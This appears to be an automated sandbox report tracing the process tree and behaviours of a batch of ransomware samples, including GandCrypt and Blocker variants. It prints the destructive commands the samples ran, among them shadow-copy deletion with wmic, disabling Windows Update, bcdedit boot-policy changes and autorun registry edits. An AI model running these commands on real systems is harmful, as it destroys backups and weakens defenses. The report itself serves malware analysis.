HPXmmgLUSavYuccxma5.exe 118 PID 380 wrote to memory of 3796 380 HPXmmgLUSavYuccxma5.exe 118 PID 380 wrote to memory of 3796 380 HPXmmgLUSavYuccxma5.exe 118 PID 1204 wrote to memory of 3164 1204 cmd.exe 120 PID 1204 wrote to memory of 3164 1204 cmd.exe 120 PID 1204 wrote to memory of 3164 1204 cmd.exe 120 PID 3796 wrote to memory of 1784 3796 csc.exe 121 PID 3796 wrote to memory of 1784 3796 csc.exe 121 PID 3796 wrote to memory of 1784 3796 csc.exe 121 PID 3164 wrote to memory of 3264 3164 Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe 122 PID 3164 wrote to memory of 3264 3164 Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe 122 PID 380 wrote to memory of 2476 380 HPXmmgLUSavYuccxma5.exe 136 PID 380 wrote to memory of 2476 380 HPXmmgLUSavYuccxma5.exe 136 PID 380 wrote to memory of 2476 380 HPXmmgLUSavYuccxma5.exe 136 PID 1204 wrote to memory of 2636 1204 cmd.exe 126 PID 1204 wrote to memory of 2636 1204 cmd.exe 126 PID 1204 wrote to memory of 2636 1204 cmd.exe 126 PID 2476 wrote to memory of 1032 2476 csc.exe 127 PID 2476 wrote to memory of 1032 2476 csc.exe 127 PID 2476 wrote to memory of 1032 2476 csc.exe 127 PID 1204 wrote to memory of 2712 1204 cmd.exe 128 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00379.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3648
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.MSIL.Blocker.gen-481e96139f87e511669b713d5810b18682d9914699cc4f1f51f71ec12523bfa8.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-481e96139f87e511669b713d5810b18682d9914699cc4f1f51f71ec12523bfa8.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Roaming\bhjgfds.exe"4⤵PID:8920
-
C:\Users\Admin\AppData\Roaming\bhjgfds.exe"C:\Users\Admin\AppData\Roaming\bhjgfds.exe"5⤵PID:9408
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵PID:5460
-
-
-
-
-
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\Desktop\00379\tpvpyme.exe"C:\Users\Admin\Desktop\00379\tpvpyme.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1808 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:10072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00379\USB_Habilitar.bat" "5⤵PID:12232
-
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00379\USB_habilitar.reg6⤵
- Runs .reg file with regedit
PID:10360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00379\windowsUpdate.bat" "5⤵PID:10380
-
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00379\windowsUpdate.reg6⤵
- Runs .reg file with regedit
PID:8272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f5⤵PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled5⤵PID:10956
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net stop wuauserv5⤵PID:4184
-
C:\Windows\SysWOW64\net.exenet stop wuauserv6⤵PID:10704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv7⤵PID:3524
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵PID:12276
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵PID:6512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵PID:9884
-
C:\Windows\SysWOW64\cmd.execmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵PID:7684
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f7⤵PID:6116
-
-
-
-
-
-
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe--9aefb4b44⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4476
-
-
-
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2424 -
C:\Windows\SysWOW64\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
-
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exeHEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1836 -
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exeHEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5656
-
-
-
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exeHEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752 -
C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exe"C:\Users\Admin\Desktop\00379\HEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exe"4⤵PID:11036
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵PID:7372
-
C:\Windows\SysWOW64\svchost.exesvchost.exe6⤵PID:3808
-
C:\Windows\InstallDir\Server.exe"C:\Windows\InstallDir\Server.exe"7⤵PID:11988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"8⤵PID:2292
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe8⤵PID:10080
-
-
C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"8⤵PID:7788
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:11140
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:10956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:11792
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:11796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:10860
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:8388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:8516
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:8588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:12100
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:6772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"6⤵PID:8340
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:11284
-
-
C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"6⤵PID:11588
-
C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"C:\Users\Admin\AppData\Local\Temp\384ngoiu.exe"7⤵PID:10644
-
-
-
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exeTrojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Users\Admin\Desktop\00379\Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe"Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe"4⤵PID:23380
-
C:\Windows\SysWOW64\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete5⤵PID:28420
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 10524⤵PID:2436
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Blocker.jiqg-ebcb76212a57b469c83b1893f3b22c4199e8726495b057e2c45b3ce146f8d4cc.exeTrojan-Ransom.Win32.Blocker.jiqg-ebcb76212a57b469c83b1893f3b22c4199e8726495b057e2c45b3ce146f8d4cc.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Adds policy Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer Phishing Filter
PID:3548
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exeTrojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\te3jeool\te3jeool.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9798.tmp" "c:\Users\Admin\AppData\Local\Temp\te3jeool\CSC2ED0EAECAE084DF0B4A3BDF5483A9E8.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pby1fmll\pby1fmll.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BED.tmp" "c:\Users\Admin\AppData\Local\Temp\pby1fmll\CSC85030FDDEF8439494509742CB2CB026.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1032
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6140 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3rxtzfbo\3rxtzfbo.cmdline"6⤵
- System Location Discovery: System Language Discovery
PID:5252 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD2AD.tmp" "c:\Users\Admin\AppData\Local\Temp\3rxtzfbo\CSCAAA5318871584B55A68242224CD1EC4.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:5920
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gh32e1bz\gh32e1bz.cmdline"6⤵PID:9528
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17D.tmp" "c:\Users\Admin\AppData\Local\Temp\gh32e1bz\CSC78D08CEFA9F14FBC8242BC152DC1BE13.TMP"7⤵PID:9396
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:8200
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:10624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10624 -s 9447⤵
- Program crash
PID:12224
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:12188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12188 -s 9647⤵
- Program crash
PID:9996
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:9680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9680 -s 9447⤵
- Program crash
PID:10360
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:10128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10128 -s 9407⤵
- Program crash
PID:11012
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:6384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6384 -s 9407⤵
- Program crash
PID:10876
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:12200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12200 -s 9407⤵
- Program crash
PID:11432
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:7576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7576 -s 9407⤵
- Program crash
PID:10588
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:7428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 9567⤵
- Program crash
PID:7040
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:10964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10964 -s 9487⤵
- Program crash
PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:5944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 9407⤵
- Program crash
PID:10352
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:9400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9400 -s 9407⤵
- Program crash
PID:9288
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:7820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7820 -s 9407⤵
- Program crash
PID:9780
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:5944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 9407⤵
- Program crash
PID:1604
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:1932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 9447⤵PID:9000
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:5108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 9407⤵PID:7440
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:10940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10940 -s 9407⤵PID:7440
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:12648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12648 -s 9687⤵PID:12788
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13092 -s 9407⤵PID:13284
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13176 -s 9607⤵PID:13988
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13160 -s 9647⤵PID:12656
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13376 -s 9407⤵PID:13520
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13228 -s 9447⤵PID:13044
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:14124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14124 -s 9407⤵PID:12540
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13456 -s 9447⤵PID:12384
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:14460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14460 -s 9407⤵PID:14676
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:14808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14808 -s 9407⤵PID:3404
-
-
-
